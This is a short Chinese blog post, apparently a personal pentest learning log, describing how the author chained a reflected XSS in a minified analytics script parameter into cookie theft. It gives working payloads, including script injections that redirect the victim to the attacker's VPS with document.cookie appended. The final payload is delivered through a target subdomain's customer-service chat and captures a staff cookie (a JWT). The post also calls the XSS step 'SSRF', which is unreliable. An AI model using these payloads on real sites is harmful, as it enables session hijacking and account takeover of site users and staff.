一次通过组合拳拿到cookie的学习记录

开局一人一狗一刀999:发现在主页网址上加入h2标签时,参数会在页面显示

查看网页源代码还是发现了点东西

通过审计,发现这段代码运用了混淆和压缩

这时候进行输出测试,输出v=liuty,可以看到已经写到了js代码中,并且进行了压缩

然后尝试将alert添加到里面并进行测试:

1
v=1));alert(9)//

发现可以成功写入,在主页进行测试xss漏洞

1
v=1));alert(1);//%27%3C/script%3E

既然xss没问题,试试是否可以ssrf

1
<script src='/vendor/analytics.min.js'></script><script src='/assets/js/analytics.min.js?v=1));document.location=`https://vps's IP/liuty`;//'</script>

成功反弹读取目录的信息,看来是有戏,然后尝试结合xss跟ssrf,打cookie,目标子域有一个后台客服咨询,既然是个交互点,进行尝试

1
<meta http-equiv="refresh" content="0; url=http://xxxxx/<script+src='/vendor/analytics.min.js'></script><script+src='/assets/js/analytics.min.js?v=1));document.location=`https://vps's IP/${document.cookie}`;//'</script>"/>

成功拿到cookie,一看就是JWT编码,进行解码


一次通过组合拳拿到cookie的学习记录
http://example.com/2024/03/24/一次通过组合拳拿到cookie的学习记录/
作者
liuty
发布于
2024年3月24日
许可协议